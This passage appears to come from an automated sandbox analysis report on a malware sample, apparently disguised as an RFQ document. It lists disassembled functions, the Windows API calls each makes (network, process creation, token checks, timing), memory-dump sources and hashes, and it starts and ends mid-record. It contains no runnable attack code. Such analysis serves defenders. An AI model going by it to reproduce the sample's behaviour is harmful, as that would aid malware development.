                                              • Instruction Fuzzy Hash: D5310DB2900148AFDB00EFA5CC859EFB7F9EF98300F10406AE515E7252EB759E45CBA1
                                              Function 0016C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • GetCursorPos.USER32(?), ref: 0016C7C2
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0011BBFB,?,?,?,?,?), ref: 0016C7D7
                                              • GetCursorPos.USER32(?), ref: 0016C824
                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0011BBFB,?,?,?), ref: 0016C85E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                              • String ID:
                                              • API String ID: 2864067406-0
                                              • Opcode ID: bb2af94a6cc7ea8e5b150e20211f5e46872322b00bdfd8025419a1584711bcbd
                                              • Instruction ID: b6dffd255dcb44d73a0e2198cdf488facd763c24c93eeb2d6bb2da590fef32e7
                                              • Opcode Fuzzy Hash: bb2af94a6cc7ea8e5b150e20211f5e46872322b00bdfd8025419a1584711bcbd
                                              • Instruction Fuzzy Hash: 6831B135601118AFCB25CF59CC98EFABBBAEB49710F048069F9458B261C7319DA1DFA0
                                              Function 00138B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00138652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00138669
                                                • Part of subcall function 00138652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00138673
                                                • Part of subcall function 00138652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00138682
                                                • Part of subcall function 00138652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00138689
                                                • Part of subcall function 00138652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0013869F
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00138BEB
                                              • _memcmp.LIBCMT ref: 00138C0E
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00138C44
                                              • HeapFree.KERNEL32(00000000), ref: 00138C4B
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                              • String ID:
                                              • API String ID: 1592001646-0
                                              • Opcode ID: c743726178cdd8d71d9e3ef22da746937dd201ec4aebfca8f2468f763ba77125
                                              • Instruction ID: 6695dd20317dc54ef96ed3e9743bf33af3e60cb257eca71047d10b24cf14cac6
                                              • Opcode Fuzzy Hash: c743726178cdd8d71d9e3ef22da746937dd201ec4aebfca8f2468f763ba77125
                                              • Instruction Fuzzy Hash: 12219D71E01209EFDB10DFA4C955BEEB7B8FF44354F144059E454A7240DB75AE46CB60
                                              Function 00100BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                              Download Yara Rule
                                              APIs
                                              • __setmode.LIBCMT ref: 00100BF2
                                                • Part of subcall function 000E5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00147B20,?,?,00000000), ref: 000E5B8C
                                                • Part of subcall function 000E5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00147B20,?,?,00000000,?,?), ref: 000E5BB0
                                              • _fprintf.LIBCMT ref: 00100C29
                                              • OutputDebugStringW.KERNEL32(?), ref: 00136331
                                                • Part of subcall function 00104CDA: _flsall.LIBCMT ref: 00104CF3
                                              • __setmode.LIBCMT ref: 00100C5E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                              • String ID:
                                              • API String ID: 521402451-0
                                              • Opcode ID: 0801c77c337f65ecfec616cb328cb1bf283de1421e3ed48e4588d7c07959f48d
                                              • Instruction ID: f74c88d509c827a30becf204465dfd42ff21251089ecc0a290d72fb354b0cab7
                                              • Opcode Fuzzy Hash: 0801c77c337f65ecfec616cb328cb1bf283de1421e3ed48e4588d7c07959f48d
                                              • Instruction Fuzzy Hash: 3F1136729042047FDB09B7B5AC83AFE7B689F99320F14416AF244A71D2DFA15D828791
                                              Function 00151A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00151A97
                                                • Part of subcall function 00151B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00151B40
                                                • Part of subcall function 00151B21: InternetCloseHandle.WININET(00000000), ref: 00151BDD
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Internet$CloseConnectHandleOpen
                                              • String ID:
                                              • API String ID: 1463438336-0
                                              • Opcode ID: 68d4ac3f31535aba52e24325a41effd6a72d10313d21cf099c176d728e352e48
                                              • Instruction ID: b7c381f7494f4944c87d8b47868cf1ba06d8619eacec81ecf1d3928a995f31c7
                                              • Opcode Fuzzy Hash: 68d4ac3f31535aba52e24325a41effd6a72d10313d21cf099c176d728e352e48
                                              • Instruction Fuzzy Hash: A2219F36200605FFDB179F609C01FBAB7B9FF58702F15401AFE219A650EB7198199BA0
                                              Function 0013E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0013F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0013E1C4,?,?,?,0013EFB7,00000000,000000EF,00000119,?,?), ref: 0013F5BC
                                                • Part of subcall function 0013F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0013F5E2
                                                • Part of subcall function 0013F5AD: lstrcmpiW.KERNEL32(00000000,?,0013E1C4,?,?,?,0013EFB7,00000000,000000EF,00000119,?,?), ref: 0013F613
                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0013EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0013E1DD
                                              • lstrcpyW.KERNEL32(00000000,?), ref: 0013E203
                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,0013EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0013E237
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: lstrcmpilstrcpylstrlen
                                              • String ID: cdecl
                                              • API String ID: 4031866154-3896280584
                                              • Opcode ID: 543670734aec203bcb73010cca703ef945cbbd29ba964ef7ac9546997ce4218b
                                              • Instruction ID: 9740e01c76696d8c21bda152cda59121bb2a92c1185a2dc70c92d734fa0f09e0
                                              • Opcode Fuzzy Hash: 543670734aec203bcb73010cca703ef945cbbd29ba964ef7ac9546997ce4218b
                                              • Instruction Fuzzy Hash: 47115E3A200345EFDB25AF64DC45A7A77A9FF89350F40402AF816CB2A4EBB19951D7A0
                                              Function 00115332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00115351
                                                • Part of subcall function 0010594C: __FF_MSGBANNER.LIBCMT ref: 00105963
                                                • Part of subcall function 0010594C: __NMSG_WRITE.LIBCMT ref: 0010596A
                                                • Part of subcall function 0010594C: RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,00000000,?,?,?,00101013,?), ref: 0010598F
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AllocateHeap_free
                                              • String ID:
                                              • API String ID: 614378929-0
                                              • Opcode ID: 17f1aafe84d7241244ea7360b9d9adf02d24deb59fdf8f107e727c27150a3a76
                                              • Instruction ID: 44a6edd2812dd7dd3c1f2287aa2f64b9a7a7827384e405928b03a374add5796a
                                              • Opcode Fuzzy Hash: 17f1aafe84d7241244ea7360b9d9adf02d24deb59fdf8f107e727c27150a3a76
                                              • Instruction Fuzzy Hash: 4E110432914A05EFCB292F70AC0469E379A7FA43A0B20453AF8A4971D0DFF089C09750
                                              Function 000E4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 000E4560
                                                • Part of subcall function 000E410D: _memset.LIBCMT ref: 000E418D
                                                • Part of subcall function 000E410D: _wcscpy.LIBCMT ref: 000E41E1
                                                • Part of subcall function 000E410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000E41F1
                                              • KillTimer.USER32(?,00000001,?,?), ref: 000E45B5
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000E45C4
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0011D6CE
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                              • String ID:
                                              • API String ID: 1378193009-0
                                              • Opcode ID: a333bed9cda277e7bf9c97695fb9a54228361f5ef479672cece3d13134d5bb72
                                              • Instruction ID: 700f9c52e80998042cd39f8fd4666a4c06627e23bba13ad0afe98a58ccc2e91f
                                              • Opcode Fuzzy Hash: a333bed9cda277e7bf9c97695fb9a54228361f5ef479672cece3d13134d5bb72
                                              • Instruction Fuzzy Hash: FD210B71904794AFEB778B24EC45BEBBBEC9F01304F04009EE69E66282C7B45AC5CB51
                                              Function 001440B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 001440D1
                                              • _memset.LIBCMT ref: 001440F2
                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00144144
                                              • CloseHandle.KERNEL32(00000000), ref: 0014414D
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                              • String ID:
                                              • API String ID: 1157408455-0
                                              • Opcode ID: 41bc095d0ad0e09d632729d0b58a3a4f92808c36e30f416b7e92be2a15cb7493
                                              • Instruction ID: a244a41c043ab179f6fac27fa6b588e300451773f44d366c82f627fd097768cb
                                              • Opcode Fuzzy Hash: 41bc095d0ad0e09d632729d0b58a3a4f92808c36e30f416b7e92be2a15cb7493
                                              • Instruction Fuzzy Hash: 9311CA759012287AE7309BA5AC4DFEBBB7CEF45760F1041AAF908D7190D7744E81CBA4
                                              Function 0015667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00147B20,?,?,00000000), ref: 000E5B8C
                                                • Part of subcall function 000E5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00147B20,?,?,00000000,?,?), ref: 000E5BB0
                                              • gethostbyname.WSOCK32(?,?,?), ref: 001566AC
                                              • WSAGetLastError.WSOCK32(00000000), ref: 001566B7
                                              • _memmove.LIBCMT ref: 001566E4
                                              • inet_ntoa.WSOCK32(?), ref: 001566EF
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                              • String ID:
                                              • API String ID: 1504782959-0
                                              • Opcode ID: a204817da2ac19a5c4e132f42db60605ad05f0ca4645f8d48038220aeb7362cd
                                              • Instruction ID: 336d8962759f38c02ce016fcd7ae6089b0dcd463513a038d2c9ab15977d8c2a8
                                              • Opcode Fuzzy Hash: a204817da2ac19a5c4e132f42db60605ad05f0ca4645f8d48038220aeb7362cd
                                              • Instruction Fuzzy Hash: 9D119035500509AFCB00EBA5DD86DEEB7B8AF58315B184069F902B7162DF70AE04CBA1
                                              Function 00139023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00139043
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00139055
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0013906B
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00139086
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: cf5f3cf3708747f8e3e07798514b550ee1f2d37a5d92bde5059b0dab500c18f3
                                              • Instruction ID: 7065441f35e084dd80da54b884af3f41e063196ac8a6cd580244b7bc58d59bd3
                                              • Opcode Fuzzy Hash: cf5f3cf3708747f8e3e07798514b550ee1f2d37a5d92bde5059b0dab500c18f3
                                              • Instruction Fuzzy Hash: 56113A79900218BFEB10DFA5C884E9DBB78FB48310F204095E904B7250D7716E50DB90
                                              Function 000E1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • DefDlgProcW.USER32(?,00000020,?), ref: 000E12D8
                                              • GetClientRect.USER32(?,?), ref: 0011B84B
                                              • GetCursorPos.USER32(?), ref: 0011B855
                                              • ScreenToClient.USER32(?,?), ref: 0011B860
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Client$CursorLongProcRectScreenWindow
                                              • String ID:
                                              • API String ID: 4127811313-0
                                              • Opcode ID: 74a5fce837fb29f1ed84328ed46dd0b2be4e5fe68a94afa3fea6049f6862d9f5
                                              • Instruction ID: 63d37f866559a6022dfd991529daf2919017301686502b36126a0bcbb4a0c388
                                              • Opcode Fuzzy Hash: 74a5fce837fb29f1ed84328ed46dd0b2be4e5fe68a94afa3fea6049f6862d9f5
                                              • Instruction Fuzzy Hash: FA114C35900159EFCB10DF95DC859FEB7B8FB05300F000459FA11E7151C770BAA28BA5
                                              Function 00141652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001401FD,?,00141250,?,00008000), ref: 0014166F
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,001401FD,?,00141250,?,00008000), ref: 00141694
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001401FD,?,00141250,?,00008000), ref: 0014169E
                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,001401FD,?,00141250,?,00008000), ref: 001416D1
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CounterPerformanceQuerySleep
                                              • String ID:
                                              • API String ID: 2875609808-0
                                              • Opcode ID: ad1237866a82e180a6f337f77cccf8ff16a02a25676df5c66e304f8cdba57e3e
                                              • Instruction ID: f5ac1998417f8ad885076c26b820bbc52ba7db7f55322e887c63f6c794fccba2
                                              • Opcode Fuzzy Hash: ad1237866a82e180a6f337f77cccf8ff16a02a25676df5c66e304f8cdba57e3e
                                              • Instruction Fuzzy Hash: 9B118E31C0051CE7CF009FA5E948AFEBB78FF09751F464059E940B2250CBB095E18B96
                                              Function 00117207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                              • Instruction ID: 81a989765a2b830b32f64bb72a5bf949a9dfa9d2c40b070cdb748fe2a810a79d
                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                              • Instruction Fuzzy Hash: F901803204814EBBCF1A5E84DC018EE3F72BF29354B198525FA1858271C337C9B2AB81
                                              Function 0016B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 0016B59E
                                              • ScreenToClient.USER32(?,?), ref: 0016B5B6
                                              • ScreenToClient.USER32(?,?), ref: 0016B5DA
                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0016B5F5
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ClientRectScreen$InvalidateWindow
                                              • String ID:
                                              • API String ID: 357397906-0
                                              • Opcode ID: cfafd2f5ee0f45ccf52a9c4c8b919cd153a0687f70ec17c090907dd219ee8ad4
                                              • Instruction ID: dfb41fca000df48faeafd681628e3d4c5a9cbbc22dc7700f08dbd99f87ef060e
                                              • Opcode Fuzzy Hash: cfafd2f5ee0f45ccf52a9c4c8b919cd153a0687f70ec17c090907dd219ee8ad4
                                              • Instruction Fuzzy Hash: C51166B5D04209EFDB01DF99D8849EEFBB9FB08310F104166E915E3620D771AA618F50
                                              Function 0016B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 0016B8FE
                                              • _memset.LIBCMT ref: 0016B90D
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001A7F20,001A7F64), ref: 0016B93C
                                              • CloseHandle.KERNEL32 ref: 0016B94E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memset$CloseCreateHandleProcess
                                              • String ID:
                                              • API String ID: 3277943733-0
                                              • Opcode ID: ac7859b9e6248c5cbe683b105db3a923a2d4cb4c4e11840dd6b066d050c01365
